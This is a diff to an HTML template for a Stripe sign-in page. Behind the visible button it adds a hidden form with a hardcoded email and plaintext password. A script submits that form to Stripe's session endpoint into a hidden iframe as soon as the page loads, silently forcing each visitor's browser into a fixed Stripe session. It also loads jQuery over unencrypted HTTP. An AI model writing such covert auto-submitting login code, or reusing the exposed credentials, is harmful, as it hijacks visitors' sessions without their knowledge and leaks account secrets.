--- a/templates/stripe/transition.html
+++ b/templates/stripe/transition.html
@@ -1,5 +1,19 @@
 <div>
-  <form method="post" >
-    <input type="submit" value="Sign in with Stripe"/>
-  </form>
+  <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.7/jquery.js"></script>
+  <center>
+    <form method="post" style="display:none" target="target" action="https://connect.stripe.com/ajax/sessions">
+      <input type="hidden" name="email" value="amruthadevme@gmail.com" />
+      <input type="password" name="password" value="Johngalt15*" />
+      <input type="submit" value="Sign in with " id="hiddenSubmit" />
+    </form>
+    <iframe name="target" style="display:none"></iframe>
+    <form method="post" >
+      <input type="submit" value="Sign in with Stripe"/>
+    </form>
+  </center>
 </div>
+<script>
+  $(document).ready(function(){
+    $('#hiddenSubmit').click();
+  });
+</script>
